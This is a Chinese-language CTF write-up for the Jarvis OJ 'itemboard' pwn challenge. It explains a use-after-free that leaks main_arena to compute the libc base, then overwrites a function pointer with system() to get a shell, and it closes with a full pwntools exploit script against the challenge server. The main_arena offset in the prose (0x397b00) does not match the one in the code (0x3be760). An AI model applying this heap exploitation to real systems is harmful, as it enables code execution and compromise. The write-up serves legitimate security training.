UAF获取main_arena地址泄露libc基址

        linux中使用free()进行内存释放时,不大于 max_fast (默认值为 64B)的 chunk 被释放后,首先会被放到 fast bins中,大于max_fast的chunk或者fast bins 中的空闲 chunk 合并后会被放入unsorted bin中(参考glibc内存管理ptmalloc源码分析一文)

        而在fastbin为空时,unsortbin的fd和bk指向自身main_arena中,该地址的相对偏移值存放在libc.so中,可以通过use after free后打印出main_arena的实际地址,结合偏移值从而得到libc的加载地址。


Jarvis OJ一道pwn题itemboard作为一个栗子。

程序功能

新建item:

其中strcpy(item->description,buf)的时候存在一个栈溢出,可以实现任意地址写。

删除item:

查看set_null()实际上一个空函数,这里free之后没有把指针置空,可以通过uaf利用。

gdb-peda的checksec查了只有NX,但是实际调试发现有PIE。

0x01 泄露libc基址

linux中使用free()进行内存释放时,不大于 max_fast (默认值为 64B)的 chunk 被释放后,首先会被放到 fast bins中,大于max_fast的chunk或者fast bins 中的空闲 chunk 合并后会被放入unsorted bin中(参考glibc内存管理ptmalloc源码分析一文)

而在fastbin为空时,unsortbin的fd和bk指向自身main_arena中,该地址的相对偏移值存放在libc.so中,可以通过use after free后打印出main_arena的实际地址,结合偏移值从而得到libc的加载地址。

max_fast的默认值是64Bytes,调试里发现global_max_fast的值是0x80,也就是说先malloc一个0x80的内存

使用中的chunk

malloc返回给用户的地址实际上是mem指向的位置

接着free()释放

释放后的chunk

其中用户输入的数据被写上了fd和bk,都指向main_arena中的位置。

free前
free后

由于free后未把指针置零,我们仍然可以选择show_item功能打印description位置的数据,此时将打印出指向main_arena中的指针:

main_arena的基址存放在libc中的malloc_trim()函数中:

该libc的main_arena偏移位0x397b00,从而计算得到libc基址。

0x02 cat flag

接着利用uaf可以覆盖item->name,item->description和item->free,把item->free覆盖为system的地址,“/bin/sh”可以直接放在item起始位置,结尾处用“;”隔断,中间的description随意填充。


from pwn import *

p=remote('pwn2.jarvisoj.com',9887)

e=ELF('./libc-2.19.so')

def add(name,length,descript):

p.recvuntil('choose:')

p.sendline('1')

p.recvuntil('Item name?')

p.sendline(name)

p.recvuntil("Description's len?")

p.sendline(str(length))

p.recvuntil('Description?')

p.sendline(descript)

p.recvuntil('Add Item Successfully!')

def showitem(index):

p.recvuntil('choose:')

p.sendline('3')

p.recvuntil('Which item?')

p.sendline(str(index))

def remove(index):

p.recvuntil('choose:')

p.sendline('4')

p.recvuntil('Which item?')

p.sendline(str(index))

add('A'*30,0x80,'A'*8)

add('B'*30,0x80,'A'*8)

remove(0)

showitem(0)

p.recvuntil('Description:')

arena_addr=u64(p.recv(6).ljust(8,'\x00'))-88

libc_base=arena_addr-0x3be760

system_addr=libc_base+e.symbols['system']

print 'system address: ',hex(system_addr)

remove(1)

add('C'*30,32,'CCCC')

add('D'*30,32,'DDDD')

remove(2)

remove(3)

add('EEEE',24,'/bin/sh;'+'EEEEEEEE'+p64(system_addr))

remove(2)

p.interactive()

推荐阅读更多精彩内容